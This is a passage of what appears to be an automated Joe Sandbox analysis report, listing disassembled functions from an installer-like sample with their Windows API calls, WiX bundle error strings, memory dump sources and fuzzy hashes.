                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2407829081-3274134579
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00867FC2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 008681EA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to write variable value as number., xrefs: 00868194
                                                                                                                                                                                                                                                                                                  • Failed to write variable name., xrefs: 008681D1
                                                                                                                                                                                                                                                                                                  • Failed to get numeric., xrefs: 008681BC
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 0086809D, 008680F3, 00868134
                                                                                                                                                                                                                                                                                                  • Failed to write variable value type., xrefs: 008681CA
                                                                                                                                                                                                                                                                                                  • Failed to get string., xrefs: 008681B5
                                                                                                                                                                                                                                                                                                  • Failed to write variable count., xrefs: 00867FDD
                                                                                                                                                                                                                                                                                                  • Failed to write variable value as string., xrefs: 008681AE
                                                                                                                                                                                                                                                                                                  • Unsupported variable type., xrefs: 008681A7
                                                                                                                                                                                                                                                                                                  • Failed to get version., xrefs: 0086819B
                                                                                                                                                                                                                                                                                                  • Failed to write literal flag., xrefs: 008681C3
                                                                                                                                                                                                                                                                                                  • Failed to write included flag., xrefs: 008681D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2118673349
                                                                                                                                                                                                                                                                                                  • Opcode ID: 211436bbb4cc66dfddb3a722c81c0acf69e74231cbee9e3d836a1ea0431fce44
                                                                                                                                                                                                                                                                                                  • Instruction ID: a47c58e1ec4238adf154deb82d67f0784bef8340b5d6e0ac4044fa1c90a17f54
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211436bbb4cc66dfddb3a722c81c0acf69e74231cbee9e3d836a1ea0431fce44
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D471B232D0061AEFDB129E68CC41BAE7BA4FF06314F124221FA19E7651CF34DD169B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0087A843,00000000,00000000,00000000,?,00000000), ref: 008797CD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008797DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4102: Sleep.KERNEL32(?,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00864DBC), ref: 008A4119
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008798E9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload in working path: %ls, xrefs: 0087980C
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00879801
                                                                                                                                                                                                                                                                                                  • %ls payload from working path '%ls' to path '%ls', xrefs: 00879894
                                                                                                                                                                                                                                                                                                  • Failed to verify payload hash: %ls, xrefs: 00879875
                                                                                                                                                                                                                                                                                                  • Moving, xrefs: 0087987F
                                                                                                                                                                                                                                                                                                  • Failed to verify payload signature: %ls, xrefs: 00879838
                                                                                                                                                                                                                                                                                                  • Copying, xrefs: 00879888, 00879893
                                                                                                                                                                                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 008798D7
                                                                                                                                                                                                                                                                                                  • Failed to move %ls to %ls, xrefs: 008798C1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1275171361-1604654059
                                                                                                                                                                                                                                                                                                  • Opcode ID: f0e8391a6af20e4c5f89ba3d7a0d5210f991321604a6d5eac54b4bdfbd3f8ed6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7da4b8f9fbc170a6ca49bf66ec5a3e15f2ec755a6f082a5394e3b5d741955f35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0e8391a6af20e4c5f89ba3d7a0d5210f991321604a6d5eac54b4bdfbd3f8ed6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78310832940625BBDA321A598C46F6B2A5CFF86B60F058134FE58FB395D270DC0096E3
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 008665FC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00866628
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866636
                                                                                                                                                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0086666E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866678
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008666BB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008666C5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00866724
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 0086665A, 0086669C
                                                                                                                                                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 008666A6
                                                                                                                                                                                                                                                                                                  • Failed to backslash terminate system folder., xrefs: 00866708
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 00866664
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                                                                                                                                                                                  • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 325818893-1590374846
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00873AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00873FB5,feclient.dll,?,00000000,?,?,?,00864B12), ref: 00873B42
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001,00000000,00000000), ref: 0087404C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2834455192-2673269691
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00872C8A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to check for remaining dependents during planning., xrefs: 00872E30
                                                                                                                                                                                                                                                                                                  • Failed to allocate registration action., xrefs: 00872CF3
                                                                                                                                                                                                                                                                                                  • Failed to add registration action for dependent related bundle., xrefs: 00872F8E
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 00872ED7
                                                                                                                                                                                                                                                                                                  • Failed to add registration action for self dependent., xrefs: 00872F57
                                                                                                                                                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 00872CC3
                                                                                                                                                                                                                                                                                                  • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00872DF4
                                                                                                                                                                                                                                                                                                  • Failed to add dependents ignored from command-line., xrefs: 00872D3F
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00872CD5, 00872DCF, 00872EC4, 00872F39
                                                                                                                                                                                                                                                                                                  • Failed to add self-dependent to ignore dependents., xrefs: 00872D0E
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1705955799
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F947
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0087FA2A
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 0087FA4B
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 0087FAF4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to convert bundle update guid into string., xrefs: 0087FA6A
                                                                                                                                                                                                                                                                                                  • update\%ls, xrefs: 0087F9A3
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087FA60
                                                                                                                                                                                                                                                                                                  • Failed to default local update source, xrefs: 0087F9B7
                                                                                                                                                                                                                                                                                                  • Failed to set update bundle., xrefs: 0087FACE
                                                                                                                                                                                                                                                                                                  • Failed to create bundle update guid., xrefs: 0087FA37
                                                                                                                                                                                                                                                                                                  • Failed to recreate command-line for update bundle., xrefs: 0087FA12
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 171215650-2594647487
APIs
• IsWindow.USER32(?), ref: 00864C64
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00864C75
Strings
• Failed to create the message window., xrefs: 00864B98
• WixBundleLayoutDirectory, xrefs: 00864BF5
• Failed to set registration variables., xrefs: 00864BDE
• Failed to set action variables., xrefs: 00864BC4
• Failed to set layout directory variable to value provided from command-line., xrefs: 00864C06
• Failed to open log., xrefs: 00864B18
• Failed to check global conditions, xrefs: 00864B49
• Failed while running , xrefs: 00864C2A
• Failed to query registration., xrefs: 00864BAE
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: MessagePostWindow
• String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
• API String ID: 3618638489-3051724725
• Opcode ID: fa5a01cc397e8b952a0c9571bcb3486ad1366c882ce2b2b810abe4377c38a5c8
• Instruction ID: 76510f77b6894408830fa67e70e0ab056daf6dd3a7d8dd17390d45eb0341eb5e
• Opcode Fuzzy Hash: fa5a01cc397e8b952a0c9571bcb3486ad1366c882ce2b2b810abe4377c38a5c8
• Instruction Fuzzy Hash: 2241113160161BBFDB265A64CC46FAFBA6CFB01764F025215F814E6741EBB0ED10A7D1
APIs
  • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
  • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
• EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0087F06E
• LeaveCriticalSection.KERNEL32(?), ref: 0087F19B
Strings
• EngineForApplication.cpp, xrefs: 0087F17C
• Failed to copy the arguments., xrefs: 0087F12D
• UX requested unknown approved exe with id: %ls, xrefs: 0087F0CE
• Failed to copy the id., xrefs: 0087F100
• Engine is active, cannot change engine state., xrefs: 0087F089
• Failed to post launch approved exe message., xrefs: 0087F186
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: CriticalHeapSection$AllocateEnterLeaveProcess
• String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
• API String ID: 1367039788-528931743
• Opcode ID: b70748a4f1daaed367b4c4476e5fac704ae06fa8558d96e87c374d333d4df6b5
• Instruction ID: 95dc6a20f4a6f8b8488e3796508b21cd52aceee5a9d73ff76fdb7d383e34606c
• Opcode Fuzzy Hash: b70748a4f1daaed367b4c4476e5fac704ae06fa8558d96e87c374d333d4df6b5
• Instruction Fuzzy Hash: 0131A532A40625EBDB22DF69DC45E9A77A8FF05720F018565FE08EB352EB31DD0087A1
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0087A7D4,00000000,00000000,00000000,?,00000000), ref: 008796B8
• GetLastError.KERNEL32(?,0087A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008796C6
  • Part of subcall function 008A4102: Sleep.KERNEL32(?,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00864DBC), ref: 008A4119
• CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008797A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLastSleep
• String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
• API String ID: 1275171361-1187406825
• Opcode ID: 6ede4d85a78bef6ec26ee9f000f8d07d4a31097e55e46aa680b8aa9effa3a83e
• Instruction ID: fd96aec03602cd8b047907a3be8a9d8324a98222cb0415473652e3ff632c3be7
• Opcode Fuzzy Hash: 6ede4d85a78bef6ec26ee9f000f8d07d4a31097e55e46aa680b8aa9effa3a83e
• Instruction Fuzzy Hash: B421F832A407257BE6321D688C86FAB355CFF92BA0F114114FE59FE3C1D2A5DC0095E6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00866FB2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 008671BE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read variable included flag., xrefs: 008671AE
                                                                                                                                                                                                                                                                                                  • Failed to read variable literal flag., xrefs: 00867199
                                                                                                                                                                                                                                                                                                  • Failed to set variable value., xrefs: 00867171
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00867192
                                                                                                                                                                                                                                                                                                  • Failed to read variable value type., xrefs: 008671A0
                                                                                                                                                                                                                                                                                                  • Unsupported variable type., xrefs: 00867184
                                                                                                                                                                                                                                                                                                  • Failed to read variable value as string., xrefs: 0086718B
                                                                                                                                                                                                                                                                                                  • Failed to read variable name., xrefs: 008671A7
                                                                                                                                                                                                                                                                                                  • Failed to read variable value as number., xrefs: 00867178
                                                                                                                                                                                                                                                                                                  • Failed to read variable count., xrefs: 00866FD2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-528957463
                                                                                                                                                                                                                                                                                                  • Opcode ID: cb84f522a2e5e6cfed14a33979bd21d046e477bb8650a4465dab333b8f38bb73
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ab52a562f5c15b05ed6112a6de09bd8f5939690fb557d68f7b8746eafde7854
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb84f522a2e5e6cfed14a33979bd21d046e477bb8650a4465dab333b8f38bb73
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A471A672C0421EABDF12DEA4CC41EAEBB79FF02718F114122F911E6151D7359E119BE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 008A4550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A4566
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 008A45BF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A45C9
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 008A461D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A4628
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 008A4717
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008A478A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3286166115-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 39eb56a360b94a6eb76fb17868d038006fda992d34afe5374976fd3bdee160eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1182519ce42829466cd0e9bba583682a701c3e3777876991c3ce44cb3d70bafd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39eb56a360b94a6eb76fb17868d038006fda992d34afe5374976fd3bdee160eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74811831A4022AEBFF218E598C45B7A7698FF83764F115129FD15EBA80E7F4DD0086D1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 008630C1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008630C7
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00863121
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00863127
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008631DB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008631E5
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0086323B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00863245
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
